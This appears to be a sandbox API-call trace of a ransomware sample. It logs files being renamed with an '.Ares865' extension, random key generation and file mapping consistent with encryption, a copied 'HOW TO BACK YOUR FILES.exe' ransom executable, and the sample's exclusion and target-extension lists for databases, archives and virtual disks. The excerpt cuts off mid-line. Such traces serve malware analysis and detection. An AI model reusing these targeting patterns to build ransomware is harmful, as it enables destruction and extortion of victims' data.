lstrcmpiW (lpString1="wtv", lpString2="wdb") returned 1 [0042.046] lstrlenW (lpString="wmdb") returned 4 [0042.046] lstrcmpiW (lpString1=".wtv", lpString2="wmdb") returned -1 [0042.046] lstrlenW (lpString="wrk") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="wrk") returned 1 [0042.046] lstrlenW (lpString="xdb") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="xdb") returned -1 [0042.046] lstrlenW (lpString="xld") returned 3 [0042.046] lstrcmpiW (lpString1="wtv", lpString2="xld") returned -1 [0042.046] lstrlenW (lpString="xmlff") returned 5 [0042.046] lstrcmpiW (lpString1="w.wtv", lpString2="xmlff") returned -1 [0042.046] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.Ares865") returned 78 [0042.046] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.Ares865" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.ares865"), dwFlags=0x1) returned 1 [0042.047] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.Ares865" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x160 [0042.047] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9699328) returned 1 [0042.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0042.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb478 [0042.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0042.047] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0042.048] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0042.048] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0042.048] CreateFileMappingW (hFile=0x160, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x940300, lpName=0x0) returned 0x12c [0042.050] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x800000, dwNumberOfBytesToMap=0x140300) returned 0x3450000 [0043.159] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0043.160] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0043.160] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbc8 [0043.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbbc8 | out: hHeap=0x2b0000) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb310 [0043.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0043.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0043.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0043.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2dddb8 [0043.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0043.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dddb8 | out: hHeap=0x2b0000) returned 1 [0043.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0043.162] UnmapViewOfFile (lpBaseAddress=0x3450000) returned 1 [0043.174] CloseHandle (hObject=0x12c) returned 1 [0043.174] CloseHandle (hObject=0x160) returned 1 [0043.643] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb478 | out: hHeap=0x2b0000) returned 1 [0043.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0043.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0043.653] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0043.653] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0043.653] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c70 [0043.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0043.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cce68 | out: hHeap=0x2b0000) returned 1 [0043.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0043.653] lstrlenW (lpString="C:\\Users\\Public\\Pictures") returned 24 [0043.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0043.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0043.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0043.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0043.654] GetLastError () returned 0x0 [0043.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0043.655] ReadFile (in: hFile=0x154, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0043.655] CloseHandle (hObject=0x154) returned 1 [0043.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0043.655] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0043.655] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x496c03c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cce68 [0043.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0043.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0043.655] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0043.655] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x496c03c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.656] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0043.656] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0043.656] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0043.656] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0043.656] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0043.656] lstrlenW (lpString="desktop.ini") returned 11 [0043.656] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\*") returned 26 [0043.656] lstrcpyW (in: lpString1=0x2cce432, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0043.656] lstrlenW (lpString="desktop.ini") returned 11 [0043.656] lstrlenW (lpString="Ares865") returned 7 [0043.656] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0043.656] lstrlenW (lpString=".dll") returned 4 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0043.656] lstrlenW (lpString=".lnk") returned 4 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0043.656] lstrlenW (lpString=".ini") returned 4 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0043.656] lstrlenW (lpString=".sys") returned 4 [0043.656] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0043.656] lstrlenW (lpString="desktop.ini") returned 11 [0043.657] lstrlenW (lpString="bak") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0043.657] lstrlenW (lpString="ba_") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0043.657] lstrlenW (lpString="dbb") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0043.657] lstrlenW (lpString="vmdk") returned 4 [0043.657] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0043.657] lstrlenW (lpString="rar") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0043.657] lstrlenW (lpString="zip") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0043.657] lstrlenW (lpString="tgz") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0043.657] lstrlenW (lpString="vbox") returned 4 [0043.657] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0043.657] lstrlenW (lpString="vdi") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0043.657] lstrlenW (lpString="vhd") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0043.657] lstrlenW (lpString="vhdx") returned 4 [0043.657] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0043.657] lstrlenW (lpString="avhd") returned 4 [0043.657] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0043.657] lstrlenW (lpString="db") returned 2 [0043.657] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0043.657] lstrlenW (lpString="db2") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0043.657] lstrlenW (lpString="db3") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0043.657] lstrlenW (lpString="dbf") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0043.657] lstrlenW (lpString="mdf") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0043.657] lstrlenW (lpString="mdb") returned 3 [0043.657] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0043.658] lstrlenW (lpString="sql") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0043.658] lstrlenW (lpString="sqlite") returned 6 [0043.658] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0043.658] lstrlenW (lpString="sqlite3") returned 7 [0043.658] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0043.658] lstrlenW (lpString="sqlitedb") returned 8 [0043.658] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0043.658] lstrlenW (lpString="xml") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0043.658] lstrlenW (lpString="$er") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0043.658] lstrlenW (lpString="4dd") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0043.658] lstrlenW (lpString="4dl") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0043.658] lstrlenW (lpString="^^^") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0043.658] lstrlenW (lpString="abs") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0043.658] lstrlenW (lpString="abx") returned 3 [0043.658] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0043.658] lstrlenW (lpString="accdb") returned 5 [0043.658] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0043.658] lstrlenW (lpString="accdc") returned 5 [0043.658] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0043.658] lstrlenW (lpString="accde") returned 5 [0043.659] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0043.659] lstrlenW (lpString="accdr") returned 5 [0043.659] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0043.659] lstrlenW (lpString="accdt") returned 5 [0043.659] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0043.659] lstrlenW (lpString="accdw") returned 5 [0043.659] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0043.659] lstrlenW (lpString="accft") returned 5 [0043.659] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0043.659] lstrlenW (lpString="adb") returned 3 [0043.659] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0043.659] lstrlenW (lpString="adb") returned 3 [0043.659] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0043.659] lstrlenW (lpString="ade") returned 3 [0043.659] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0043.659] lstrlenW (lpString="adf") returned 3 [0043.659] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0043.659] lstrlenW (lpString="adn") returned 3 [0043.659] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0043.659] lstrlenW (lpString="adp") returned 3 [0043.659] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0043.660] lstrlenW (lpString="alf") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0043.660] lstrlenW (lpString="ask") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0043.660] lstrlenW (lpString="btr") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0043.660] lstrlenW (lpString="cat") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0043.660] lstrlenW (lpString="cdb") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0043.660] lstrlenW (lpString="ckp") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0043.660] lstrlenW (lpString="cma") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0043.660] lstrlenW (lpString="cpd") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0043.660] lstrlenW (lpString="dacpac") returned 6 [0043.660] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0043.660] lstrlenW (lpString="dad") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0043.660] lstrlenW (lpString="dadiagrams") returned 10 [0043.660] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0043.660] lstrlenW (lpString="daschema") returned 8 [0043.660] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0043.660] lstrlenW (lpString="db-journal") returned 10 [0043.660] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0043.660] lstrlenW (lpString="db-shm") returned 6 [0043.660] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0043.660] lstrlenW (lpString="db-wal") returned 6 [0043.660] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0043.660] lstrlenW (lpString="dbc") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0043.660] lstrlenW (lpString="dbs") returned 3 [0043.660] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0043.660] lstrlenW (lpString="dbt") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0043.661] lstrlenW (lpString="dbv") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0043.661] lstrlenW (lpString="dbx") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0043.661] lstrlenW (lpString="dcb") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0043.661] lstrlenW (lpString="dct") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0043.661] lstrlenW (lpString="dcx") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0043.661] lstrlenW (lpString="ddl") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0043.661] lstrlenW (lpString="dlis") returned 4 [0043.661] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0043.661] lstrlenW (lpString="dp1") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0043.661] lstrlenW (lpString="dqy") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0043.661] lstrlenW (lpString="dsk") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0043.661] lstrlenW (lpString="dsn") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0043.661] lstrlenW (lpString="dtsx") returned 4 [0043.661] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0043.661] lstrlenW (lpString="dxl") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0043.661] lstrlenW (lpString="eco") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0043.661] lstrlenW (lpString="ecx") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0043.661] lstrlenW (lpString="edb") returned 3 [0043.661] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0043.661] lstrlenW (lpString="epim") returned 4 [0043.661] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0043.662] lstrlenW (lpString="fcd") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0043.662] lstrlenW (lpString="fdb") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0043.662] lstrlenW (lpString="fic") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0043.662] lstrlenW (lpString="flexolibrary") returned 12 [0043.662] lstrlenW (lpString="fm5") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0043.662] lstrlenW (lpString="fmp") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0043.662] lstrlenW (lpString="fmp12") returned 5 [0043.662] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0043.662] lstrlenW (lpString="fmpsl") returned 5 [0043.662] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0043.662] lstrlenW (lpString="fol") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0043.662] lstrlenW (lpString="fp3") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0043.662] lstrlenW (lpString="fp4") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0043.662] lstrlenW (lpString="fp5") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0043.662] lstrlenW (lpString="fp7") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0043.662] lstrlenW (lpString="fpt") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0043.662] lstrlenW (lpString="frm") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0043.662] lstrlenW (lpString="gdb") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0043.662] lstrlenW (lpString="gdb") returned 3 [0043.662] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0043.662] lstrlenW (lpString="grdb") returned 4 [0043.662] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0043.663] lstrlenW (lpString="gwi") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0043.663] lstrlenW (lpString="hdb") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0043.663] lstrlenW (lpString="his") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0043.663] lstrlenW (lpString="ib") returned 2 [0043.663] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0043.663] lstrlenW (lpString="idb") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0043.663] lstrlenW (lpString="ihx") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0043.663] lstrlenW (lpString="itdb") returned 4 [0043.663] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0043.663] lstrlenW (lpString="itw") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0043.663] lstrlenW (lpString="jet") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0043.663] lstrlenW (lpString="jtx") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0043.663] lstrlenW (lpString="kdb") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0043.663] lstrlenW (lpString="kexi") returned 4 [0043.663] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0043.663] lstrlenW (lpString="kexic") returned 5 [0043.663] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0043.663] lstrlenW (lpString="kexis") returned 5 [0043.663] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0043.663] lstrlenW (lpString="lgc") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0043.663] lstrlenW (lpString="lwx") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0043.663] lstrlenW (lpString="maf") returned 3 [0043.663] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0043.663] lstrlenW (lpString="maq") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0043.664] lstrlenW (lpString="mar") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0043.664] lstrlenW (lpString="marshal") returned 7 [0043.664] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0043.664] lstrlenW (lpString="mas") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0043.664] lstrlenW (lpString="mav") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0043.664] lstrlenW (lpString="maw") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0043.664] lstrlenW (lpString="mdbhtml") returned 7 [0043.664] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0043.664] lstrlenW (lpString="mdn") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0043.664] lstrlenW (lpString="mdt") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0043.664] lstrlenW (lpString="mfd") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0043.664] lstrlenW (lpString="mpd") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0043.664] lstrlenW (lpString="mrg") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0043.664] lstrlenW (lpString="mud") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0043.664] lstrlenW (lpString="mwb") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0043.664] lstrlenW (lpString="myd") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0043.664] lstrlenW (lpString="ndf") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0043.664] lstrlenW (lpString="nnt") returned 3 [0043.664] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0043.664] lstrlenW (lpString="nrmlib") returned 6 [0043.664] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0043.665] lstrlenW (lpString="ns2") returned 3 [0043.665] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0043.665] lstrlenW (lpString="ns3") returned 3 [0043.665] lstrcmpiW (lpString1="ini", 